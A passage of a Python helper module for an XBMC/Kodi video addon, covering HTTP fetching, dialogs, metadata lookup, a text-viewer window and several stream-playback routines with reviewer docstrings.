        try: html=net.http_GET(url,headers=headers).content
        except: html=dhtml
    elif method.lower()=='post':
        try: html=net.http_POST(url,form_data=form_data,headers=headers).content #,compression=False
        except: html=dhtml
    elif method.lower()=='head':
        try: html=net.http_HEAD(url,headers=headers).content
        except: html=dhtml
    if (len(html) > 0) and (len(cookie_file) > 0) and (save_cookie==True): net.save_cookies(cookie_file)
    if 'Website is offline' in html: popOK(msg="Website is offline",title=ps('__plugin__'),line2="Site Web est deconnecte",line3="")
    elif 'Erreur de la base de donn' in html: popOK(msg="Error Database",title=ps('__plugin__'),line2="Erreur de la base de donnees",line3="")
    return html
def BusyAnimationShow():
    """Open the busy-spinner dialog."""
    xbmc.executebuiltin('ActivateWindow(busydialog)')
def BusyAnimationHide():
    """Close the busy-spinner dialog."""
    xbmc.executebuiltin('Dialog.Close(busydialog,true)')
def closeAllDialogs():
    """Force-close every open XBMC dialog."""
    xbmc.executebuiltin('Dialog.Close(all, true)')
def popYN(title='',line1='',line2='',line3='',n='',y=''):
    """Yes/No dialog; returns the dialog's truthy answer, or False."""
    answer = xbmcgui.Dialog().yesno(title, line1, line2, line3, n, y)
    return answer or False
def popOK(msg="",title="",line2="",line3=""):
    """Show a simple OK message dialog (return value is discarded)."""
    xbmcgui.Dialog().ok(title, msg, line2, line3)
def spAfterSplit(t,ss):
    """Return the segment of `t` immediately after the first `ss`
    (up to the next `ss`, if any); `t` unchanged when `ss` is absent."""
    return t.split(ss)[1] if ss in t else t
def spBeforeSplit(t,ss):
    """Return the part of `t` before the first `ss`; `t` unchanged when `ss` is absent."""
    return t.split(ss)[0] if ss in t else t
def TP(s):
    """Shorthand for xbmc.translatePath."""
    return xbmc.translatePath(s)
def TPap(s,fe='.py'):
    """Translate the path of file `s` + extension `fe` inside the addon directory."""
    return xbmc.translatePath(os.path.join(_addonPath, s + fe))
def CopyAFile(tFrom,tTo):
    """Best-effort copy of `tFrom` to `tTo`; failures are silently ignored.

    The bare ``except: pass`` was narrowed to ``except Exception`` so that
    KeyboardInterrupt/SystemExit are no longer swallowed, and the always-
    available ``shutil`` import was moved out of the try block.
    """
    import shutil
    try:
        shutil.copy(tFrom, tTo)
    except Exception:
        pass
def checkHostProblems(url,b=False,t=True):
    """Return `t` when `url` contains a known-problematic host, otherwise `b`."""
    problem_hosts = ('embed.yourupload.com/', 'novamov.com/', 'veevr.com/')
    if any(host in url for host in problem_hosts):
        b = t
    return b
### #Metahandler
#try: from script.module.metahandler import metahandlers
#except: from metahandler import metahandlers
#grab=metahandlers.MetaData(preparezip=False)
#def GRABMETA(name,types):
# type=types
# EnableMeta=tfalse(addst("enableMeta"))
# if (EnableMeta==True):
# if ('movie' in type):
# ### grab.get_meta(media_type, name, imdb_id='', tmdb_id='', year='', overlay=6)
# meta=grab.get_meta('movie',name,'',None,None,overlay=6)
# infoLabels={'rating': meta['rating'],'duration': meta['duration'],'genre': meta['genre'],'mpaa':"rated %s"%meta['mpaa'],'plot': meta['plot'],'title': meta['title'],'writer': meta['writer'],'cover_url': meta['cover_url'],'director': meta['director'],'cast': meta['cast'],'backdrop': meta['backdrop_url'],'backdrop_url': meta['backdrop_url'],'tmdb_id': meta['tmdb_id'],'year': meta['year'],'votes': meta['votes'],'tagline': meta['tagline'],'premiered': meta['premiered'],'trailer_url': meta['trailer_url'],'studio': meta['studio'],'imdb_id': meta['imdb_id'],'thumb_url': meta['thumb_url']}
# #infoLabels={'rating': meta['rating'],'duration': meta['duration'],'genre': meta['genre'],'mpaa':"rated %s"%meta['mpaa'],'plot': meta['plot'],'title': meta['title'],'writer': meta['writer'],'cover_url': meta['cover_url'],'director': meta['director'],'cast': meta['cast'],'backdrop_url': meta['backdrop_url'],'backdrop_url': meta['backdrop_url'],'tmdb_id': meta['tmdb_id'],'year': meta['year']}
# elif ('tvshow' in type):
# meta=grab.get_meta('tvshow',name,'','',None,overlay=6)
# #print meta
# infoLabels={'rating': meta['rating'],'genre': meta['genre'],'mpaa':"rated %s"%meta['mpaa'],'plot': meta['plot'],'title': meta['title'],'cover_url': meta['cover_url'],'cast': meta['cast'],'studio': meta['studio'],'banner_url': meta['banner_url'],'backdrop_url': meta['backdrop_url'],'status': meta['status'],'premiered': meta['premiered'],'imdb_id': meta['imdb_id'],'tvdb_id': meta['tvdb_id'],'year': meta['year'],'imgs_prepacked': meta['imgs_prepacked'],'overlay': meta['overlay'],'duration': meta['duration']}
# #infoLabels={'rating': meta['rating'],'genre': meta['genre'],'mpaa':"rated %s"%meta['mpaa'],'plot': meta['plot'],'title': meta['title'],'cover_url': meta['cover_url'],'cast': meta['cast'],'studio': meta['studio'],'banner_url': meta['banner_url'],'backdrop_url': meta['backdrop_url'],'status': meta['status']}
# else: infoLabels={}
# else: infoLabels={}
# return infoLabels
def MetaGrab(media_type,meta_name,imdb_id='',tmdb_id='',year='',season='',episode=''):
    """Look up artwork/plot metadata through the optional `metahandler` addon.

    Args:
        media_type: 'movie'/'m', 'tvshow'/'t' or 'episode'/'e'.
        meta_name: title to search for.
        imdb_id, tmdb_id, year, season, episode: optional refinements.

    Returns:
        A metahandler info-label dict, or a placeholder dict when the
        metahandler import fails, metadata is disabled, or the episode
        lookup raises.

    Bug fix: the episode branch referenced the undefined name ``tv_meta``
    (a NameError silently caught by the bare except, so episode metadata
    always fell back to the placeholder labels); it now uses the
    ``imdb_id`` resolved just above.
    """
    default_infoLabels={'overlay':6,'title':meta_name,'tvdb_id':'','imdb_id':'','cover_url':_artIcon,'poster':_artIcon,'trailer_url':'','trailer':'','TVShowTitle':meta_name,'backdrop_url':_artFanart,'banner_url':''}
    try: from metahandler import metahandlers
    except: debob("failed to import metahandler"); return default_infoLabels
    grab=metahandlers.MetaData(preparezip=False)
    try: EnableMeta=tfalse(addst("enableMeta"))
    except: EnableMeta=True
    if (EnableMeta==True):
        if ('movie' in media_type) or (media_type=='m'):
            infoLabels=grab.get_meta("movie",meta_name,imdb_id=imdb_id,tmdb_id=tmdb_id,year=year)
        elif ('tvshow' in media_type) or (media_type=='t'):
            infoLabels=grab.get_meta("tvshow",meta_name,imdb_id=imdb_id)
        elif ('episode' in media_type) or (media_type=='e'):
            if len(imdb_id)==0:
                # resolve the show first so the episode lookup has an imdb id
                t_infoLabels=grab.get_meta("tvshow",meta_name,imdb_id=imdb_id)
                imdb_id=t_infoLabels['imdb_id']
            try:
                iseason=int(season)
                iepisode=int(episode)
                infoLabels=grab.get_episode_meta(tvshowtitle=meta_name,imdb_id=imdb_id,season=iseason,episode=iepisode)
            except: infoLabels={'overlay':6,'title':str(season)+'x'+str(episode),'tvdb_id':'','imdb_id':'','cover_url':_artIcon,'poster':_artIcon,'TVShowTitle':meta_name}
        else: infoLabels=default_infoLabels
        #
    else: infoLabels=default_infoLabels
    return infoLabels
#
### ############################################################################################################
class TextBox2: ## Usage Example: TextBox_FromUrl().load('https://raw.github.com/HIGHWAY99/plugin.video.theanimehighway/master/README.md')
    """Helper around XBMC's built-in text viewer window (id 10147).

    Call one of load_url / load_file / load_string to open the window and
    fill it with text fetched from a URL, read from a local file, or
    passed in directly.
    """
    WINDOW = 10147; CONTROL_LABEL = 1; CONTROL_TEXTBOX = 5; HEADER_MESSAGE = "%s - ( v%s )" % (__plugin__,addon.get_version()) # set heading
    def load_url(self, URL_PATH, HEADER_MESSAGE2=''):
        """Fetch URL_PATH (empty text on failure) and show it in the viewer."""
        deb('text window from url: ',URL_PATH) #self.URL_PATH
        try: text=nURL(URL_PATH)#(self.URL_PATH)
        except: text=''
        self.load_window(); self.set_header(HEADER_MESSAGE2); self.set_text(text)
    def load_file(self, FILE_NAME='changelog.txt', HEADER_MESSAGE2='', FILE_PATH=_addonPath):
        """Show the contents of FILE_PATH/FILE_NAME in the viewer."""
        txt_path = os.path.join(FILE_PATH,FILE_NAME)
        deb('text window from file: ',txt_path)
        # NOTE(review): the file handle is never closed explicitly.
        f = open(txt_path)
        text = f.read()
        self.load_window(); self.set_header(HEADER_MESSAGE2); self.set_text(text)
    def load_string(self, text_string='', HEADER_MESSAGE2=''):
        """Show a literal string in the viewer."""
        self.load_window(); xbmc.sleep(20); self.set_header(HEADER_MESSAGE2); self.set_text(text_string)
    def load_window(self, sleeptime=500):
        """Open the text viewer window and wait `sleeptime` ms for it to initialize."""
        xbmc.executebuiltin("ActivateWindow(%d)" % ( self.WINDOW, )) # activate the text viewer window
        self.win = xbmcgui.Window(self.WINDOW) # get window
        xbmc.sleep(sleeptime) # give window time to initialize
    def set_header(self, HEADER_MESSAGE2=''):
        """Set the window heading; defaults to "<plugin> - ( v<version> )"."""
        if (HEADER_MESSAGE2==''): HEADER_MESSAGE2=self.HEADER_MESSAGE
        self.win.getControl(self.CONTROL_LABEL).setLabel(HEADER_MESSAGE2)
    def set_text(self, text=''):
        """Fill the viewer's textbox control with `text`."""
        self.win.getControl(self.CONTROL_TEXTBOX).setText(text)
def RefreshList():
    """Force the current XBMC container to reload its listing."""
    xbmc.executebuiltin("XBMC.Container.Refresh")
def String2TextBox(message='',HeaderMessage=''):
    """Display `message` in the big text-viewer window."""
    TextBox2().load_string(message, HeaderMessage)
### ############################################################################################################
### ############################################################################################################
### ############################################################################################################
### ############################################################################################################
### ############################################################################################################
##### Player Functions #####
def PlayItCustomL(url,stream_url,img,title,studio=''):
    """Play a live stream whose playlist URL returns one media URL per line.

    Fetches `stream_url`, extracts every ``scheme://...`` line from the
    body, queues each into the video playlist, resolves `url` back to the
    plugin and starts playback with the user's configured core player.
    """
    PlayerMethod=addst("core-player")
    if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
    elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
    elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
    else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
    listitem=xbmcgui.ListItem(title,iconImage=img,thumbnailImage=img); listitem.setInfo('video',{'Title':title,'Genre':'Live','Studio':studio})
    PL=xbmc.PlayList(xbmc.PLAYLIST_VIDEO); PL.clear(); #PL.add(stream_url,listitem)
    #
    html=nURL(stream_url); deb('Length of html',str(len(html)));
    # one playable URL per line of the fetched body
    matches=re.compile('\n+\s*(.*?://.*)\s*\n+').findall(html)
    #debob(matches)
    if len(matches) > 0:
        for match in matches:
            #debob(match)
            PL.add(match,listitem)
    #
    try: _addon.resolve_url(url)
    except: t=''
    try: play=xbmc.Player(PlayerMeth); play.play(PL)
    except: t=''
def PlayItCustomL2A(url,stream_url,img,title,studio=''):
    """HLS variant of PlayItCustomL.

    Downloads the m3u8 at `stream_url`, injects a NAME attribute into each
    variant line, saves the rewritten playlist to resources/playlist.txt
    and plays that local file.
    """
    PlayerMethod=addst("core-player")
    if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
    elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
    elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
    else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
    listitem=xbmcgui.ListItem(title,iconImage=img,thumbnailImage=img); listitem.setInfo('video',{'Title':title,'Genre':'Live','Studio':studio})
    PL=xbmc.PlayList(xbmc.PLAYLIST_VIDEO); PL.clear(); #PL.add(stream_url,listitem)
    html=nURL(stream_url); deb('Length of html',str(len(html)));
    # give every HLS variant a visible name in the stream selector
    html=html.replace('#EXT-X-STREAM-INF:PROGRAM-ID=','#EXT-X-STREAM-INF:NAME="'+title+'",PROGRAM-ID=')
    PlaylistFile=xbmc.translatePath(os.path.join(_addonPath,'resources','playlist.txt')); debob(PlaylistFile)
    _SaveFile(PlaylistFile,html)
    PL.add(PlaylistFile,listitem)
    try: _addon.resolve_url(url)
    except: t=''
    try: play=xbmc.Player(PlayerMeth); play.play(PL)
    except: t=''
def PlayItCustomMT(url,stream_url,img,title,studio=''):
    """Play `stream_url` through the multi-threaded download proxy helper.

    The proxy wraps the stream URL so playback is served via the local
    axel-based proxy; otherwise identical to PlayItCustom.
    """
    PlayerMethod=addst("core-player")
    if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
    elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
    elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
    else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
    import proxy; axelhelper=proxy.ProxyHelper()
    MultiThread_url=axelhelper.create_proxy_url(stream_url)
    ###
    listitem=xbmcgui.ListItem(thumbnailImage=img); listitem.setInfo('video',{'Title':title,'Genre':'Live','Studio':studio})
    PL=xbmc.PlayList(xbmc.PLAYLIST_VIDEO); PL.clear(); PL.add(MultiThread_url,listitem)
    try: _addon.resolve_url(url)
    except: t=''
    try: play=xbmc.Player(PlayerMeth); play.play(PL)
    except: t=''
def PlayItCustom(url,stream_url,img,title,studio=''):
    """Queue `stream_url` as a single playlist item and play it.

    `url` is resolved back to the plugin handle; the core player is taken
    from the "core-player" addon setting.
    """
    PlayerMethod=addst("core-player")
    if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
    elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
    elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
    else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
    listitem=xbmcgui.ListItem(thumbnailImage=img); listitem.setInfo('video',{'Title':title,'Genre':'Live','Studio':studio})
    PL=xbmc.PlayList(xbmc.PLAYLIST_VIDEO); PL.clear(); PL.add(stream_url,listitem)
    try: _addon.resolve_url(url)
    except: t=''
    try: play=xbmc.Player(PlayerMeth); play.play(PL)
    except: t=''
def PlayURL(url):
    """Play `url` directly with a ListItem built from the plugin parameters.

    Marks the item watched beforehand when the MarkAsWatched parameter is
    set, and rolls the watched flag back if playback setup raises.
    """
    PlayerMethod=addst("core-player")
    if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
    elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
    elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
    else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
    play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
    #play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
    try: _addon.resolve_url(url)
    except: t=''
    wwT=addpr("wwT"); wwB=tfalse(addpr("MarkAsWatched","false"));
    deb("MarkAsWatched",str(wwB));
    infoLabels={"Studio":addpr('studio',''),"ShowTitle":addpr('showtitle',''),"Title":addpr('title','')}
    li=xbmcgui.ListItem(addpr('title',''),iconImage=addpr('img',''),thumbnailImage=addpr('img',''))
    li.setInfo(type="Video", infoLabels=infoLabels ); li.setProperty('IsPlayable', 'true')
    deb('url',url)
    try:
        if (wwB==True) and (len(wwT) > 0): deb("Attempting to add episode to watched list",wwT); visited_add(wwT);
        play.play(url,li)
    except:
        try: play.play(url)
        except:
            if (wwB==True) and (len(wwT) > 0): deb("Attempting to remove episode to watched list",wwT); visited_remove(wwT);
def PlayURL1(url):
    """Play `url` without building a ListItem (bare play).

    Same watched-list bookkeeping as PlayURL: mark watched before play,
    roll back when play() raises.
    """
    PlayerMethod=addst("core-player")
    if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
    elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
    elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
    else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
    play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
    #play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
    try: _addon.resolve_url(url)
    except: t=''
    wwT=addpr("wwT"); wwB=tfalse(addpr("MarkAsWatched","false"));
    deb("MarkAsWatched",str(wwB));
    try:
        if (wwB==True) and (len(wwT) > 0): deb("Attempting to add episode to watched list",wwT); visited_add(wwT);
        play.play(url)
    except:
        if (wwB==True) and (len(wwT) > 0): deb("Attempting to remove episode to watched list",wwT); visited_remove(wwT);
def PlayURLs(url):
    """Play `url`, dispatching on its scheme.

    mss/mssh/rtsp URLs are written to a temporary .strm file and that file
    is played (works around player limitations); http URLs are first run
    through urlresolver with a direct-play fallback; anything else is
    played as-is.
    """
    PlayerMethod=addst("core-player")
    if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
    elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
    elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
    else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
    play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
    #play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
    filename=xbmc.translatePath(os.path.join(_addonPath,'resources','test.strm'))
    try: _addon.resolve_url(url)
    except: pass
    if ':' in url: uPre=url.split(':')[0]
    else: uPre='____'
    if (uPre.lower()=='mss') or (uPre.lower()=='mssh') or (uPre.lower()=='rtsp'):
        _SaveFile(filename,url)
        try: play.play(filename) #(url)
        except: pass
    elif (uPre.lower()=='http'):
        import urlresolver
        try:
            stream_url=urlresolver.HostedMediaFile(url).resolve()
            play.play(stream_url)
        except:
            try: play.play(url)
            except: pass
    else:
        try: play.play(url)
        except: pass
    #
def PlayURLs2(url):
    """Like PlayURLs but without the urlresolver step for http URLs.

    mss/mssh/rtsp URLs go through the temporary .strm file; everything
    else is played directly.
    """
    PlayerMethod=addst("core-player")
    if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
    elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
    elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
    else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
    play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
    #play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
    filename=xbmc.translatePath(os.path.join(_addonPath,'resources','test.strm'))
    try: _addon.resolve_url(url)
    except: pass
    if ':' in url: uPre=url.split(':')[0]
    else: uPre='____'
    if (uPre.lower()=='mss') or (uPre.lower()=='mssh') or (uPre.lower()=='rtsp'):
        _SaveFile(filename,url)
        try: play.play(filename) #(url)
        except: pass
    else:
        try: play.play(url)
        except: pass
def PlayURLstrm(url):
    """Always play `url` through a temporary resources/test.strm file."""
    PlayerMethod=addst("core-player")
    if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
    elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
    elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
    else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
    play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
    #play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
    filename=xbmc.translatePath(os.path.join(_addonPath,'resources','test.strm'))
    _SaveFile(filename,url)
    try: _addon.resolve_url(url)
    except: t=''
    try: play.play(filename) #(url)
    except: t=''
def PlayVideo(url):
    """Play `url` with a ListItem built from the plugin's studio/title/img
    parameters; no watched-list bookkeeping and no url resolving."""
    PlayerMethod=addst("core-player")
    if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
    elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
    elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
    else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
    play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
    #play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
    #import urlresolver
    infoLabels={"Studio":addpr('studio',''),"ShowTitle":addpr('showtitle',''),"Title":addpr('title','')}
    li=xbmcgui.ListItem(addpr('title',''),iconImage=addpr('img',''),thumbnailImage=addpr('img',''))
    li.setInfo(type="Video", infoLabels=infoLabels ); li.setProperty('IsPlayable', 'true')
    #xbmc.Player().stop()
    try: _addon.resolve_url(url)
    except: t=''
    try: play.play(url, li)
    except: t=''
def PlayFromHost(url):
    """Resolve `url` through urlresolver (youtube passes through) and play it.

    On resolve failure a notification is shown and the function returns.
    Marks the item watched beforehand when the MarkAsWatched parameter is
    set, and rolls the watched flag back when playback setup raises.
    """
    PlayerMethod=addst("core-player")
    if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
    elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
    elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
    else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
    play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
    #play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
    import urlresolver
    infoLabels={"Studio":addpr('studio',''),"ShowTitle":addpr('showtitle',''),"Title":addpr('title','')}
    li=xbmcgui.ListItem(addpr('title',''),iconImage=addpr('img',''),thumbnailImage=addpr('img',''))
    li.setInfo(type="Video", infoLabels=infoLabels ); li.setProperty('IsPlayable', 'true')
    deb('url',url)
    ###
    #try: _addon.resolve_url(url)
    #except: t=''
    #stream_url='http://s6.vidcache.net/stream/a4133ca7743c0a0f4ff063f715d934472bb1d513?client_file_id=524368'
    #play.play(stream_url, li)
    ###
    if ('youtube.com' in url):
        stream_url=url
    else:
        debob(urlresolver.HostedMediaFile(url))
        #stream_url = urlresolver.HostedMediaFile(url).resolve()
        try: stream_url = urlresolver.HostedMediaFile(url).resolve()
        except: deb('Link URL Was Not Resolved',url); myNote("urlresolver.HostedMediaFile(url).resolve()","Failed to Resolve Playable URL."); return
    try: debob(stream_url) #deb('stream_url',stream_url)
    except: t=''
    #xbmc.Player().stop()
    try: _addon.resolve_url(url)
    except: t=''
    wwT=addpr("wwT"); wwB=tfalse(addpr("MarkAsWatched","false"));
    deb("MarkAsWatched",str(wwB));
    try:
        if (wwB==True) and (len(wwT) > 0): deb("Attempting to add episode to watched list",wwT); visited_add(wwT);
        play.play(stream_url,li);
    except:
        if (wwB==True) and (len(wwT) > 0): deb("Attempting to remove episode to watched list",wwT); visited_remove(wwT);
        t='';
def PlayFromHostMT(url):
    """Multi-threaded variant of PlayFromHost.

    Resolves `url` through urlresolver (youtube passes through) and hands
    the resolved stream to the axel proxy helper's playUrl().

    NOTE(review): everything after the unconditional ``return`` below is
    unreachable -- the watched-list bookkeeping and the direct
    ``play.play(MultiThread_url, li)`` path never execute (and
    ``MultiThread_url`` is never assigned in this version).
    """
    PlayerMethod=addst("core-player")
    if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
    elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
    elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
    else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
    play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
    #play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
    import urlresolver
    infoLabels={"Studio":addpr('studio',''),"ShowTitle":addpr('showtitle',''),"Title":addpr('title','')}
    li=xbmcgui.ListItem(addpr('title',''),iconImage=addpr('img',''),thumbnailImage=addpr('img',''))
    li.setInfo(type="Video", infoLabels=infoLabels ); li.setProperty('IsPlayable', 'true')
    deb('url',url)
    ###
    #try: _addon.resolve_url(url)
    #except: t=''
    #stream_url='http://s6.vidcache.net/stream/a4133ca7743c0a0f4ff063f715d934472bb1d513?client_file_id=524368'
    #play.play(stream_url, li)
    ###
    if ('youtube.com' in url):
        stream_url=url
    else:
        debob(urlresolver.HostedMediaFile(url))
        #stream_url = urlresolver.HostedMediaFile(url).resolve()
        try: stream_url = urlresolver.HostedMediaFile(url).resolve()
        except: deb('Link URL Was Not Resolved',url); myNote("urlresolver.HostedMediaFile(url).resolve()","Failed to Resolve Playable URL."); return
    try: debob(stream_url) #deb('stream_url',stream_url)
    except: t=''
    #xbmc.Player().stop()
    try: _addon.resolve_url(url)
    except: t=''
    wwT=addpr("wwT"); wwB=tfalse(addpr("MarkAsWatched","false"));
    deb("MarkAsWatched",str(wwB));
    #from axel.downloader import proxy;
    import proxy;
    axelhelper=proxy.ProxyHelper()
    axelhelper.playUrl(stream_url);
    #print axelhelper.download(urlhere);
    #MultiThread_url=axelhelper.create_proxy_url(stream_url)
    ###
    #play.play(MultiThread_url,li);
    return
    # --- unreachable from here down (see docstring) ---
    try:
        if (wwB==True) and (len(wwT) > 0): deb("Attempting to add episode to watched list",wwT); visited_add(wwT);
        #play.play(stream_url,li);
        play.play(MultiThread_url,li);
    except:
        if (wwB==True) and (len(wwT) > 0): deb("Attempting to remove episode to watched list",wwT); visited_remove(wwT);
        t='';
### ############################################################################################################
### ############################################################################################################
def filename_filter_out_year(name=''):
    """Strip every ' (YYYY)' year annotation from a title string and trim whitespace."""
    padded = '__' + name + '__'
    for year in re.compile(' \((\d+)\)').findall(padded):
        name = name.replace(' (' + year + ')', '')
    return name.strip()
def QP(v):
    """URL-encode `v` as a query-string value (quote_plus)."""
    return urllib.quote_plus(v)
def DoLabs2LB(labs, subfav=''):
    """Copy a known set of label keys out of `labs` into a flat dict.

    The string-ish keys are coerced with str() and default to '' when
    missing or un-stringable; 'site' and 'section' are taken verbatim,
    falling back first to the matching plugin parameter (addpr) and then
    to ''.

    `subfav` is accepted for caller compatibility but (as in the original,
    where the code storing it was commented out) is not stored.

    Refactor: the original repeated the identical try/except block ~13
    times (with 'plot' duplicated); collapsed into two data-driven loops
    with identical behavior.
    """
    LB = {}
    for n in ('title', 'year', 'img', 'fanart', 'plot', 'url', 'country',
              'genres', 'todoparams', 'commonid', 'commonid2'):
        try: LB[n] = str(labs[n])
        except: LB[n] = ''
    for n in ('site', 'section'):
        try: LB[n] = labs[n]
        except:
            try: LB[n] = addpr(n, '')
            except: LB[n] = ''
    return LB
def ContextMenu_Favorites(labs={}):
    """Build the context-menu entries for an item shown in a favorites list.

    Adds an optional Info entry (per settings) plus a Remove-from-favorites
    entry targeting the current sub-favorites slot.  Returns a list of
    (label, builtin-command) tuples for addContextMenuItems.
    NOTE(review): `labs` is a mutable default -- safe only because it is
    never mutated here.
